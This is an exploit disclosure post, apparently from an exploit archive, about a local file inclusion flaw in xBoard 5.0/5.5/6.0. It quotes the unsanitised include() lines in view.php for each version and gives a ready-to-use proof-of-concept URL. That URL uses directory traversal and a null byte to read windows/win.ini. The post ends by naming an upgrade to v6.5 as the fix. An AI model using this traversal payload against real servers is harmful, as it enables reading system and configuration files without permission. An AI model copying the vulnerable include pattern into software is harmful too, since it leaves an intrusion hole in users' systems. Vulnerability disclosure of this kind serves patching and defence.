facebook facebook twitter rss

xBoard 5.0/5.5/6.0 Local File Inclusion

Author: TUNISIAN CYBER , Published: 11-12-2013
+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 11-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/xboard/
[+] Tested on: Win7 , ubuntu 13.04

########################################################################################
I/Vulnerable code: view.php
v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51: include("$directory/$post.html");

v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30: include("$directory/$post.html");

v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29: include("$directory/$post.html");

II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg

III/Solution:
Upgrade to v6.5

./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :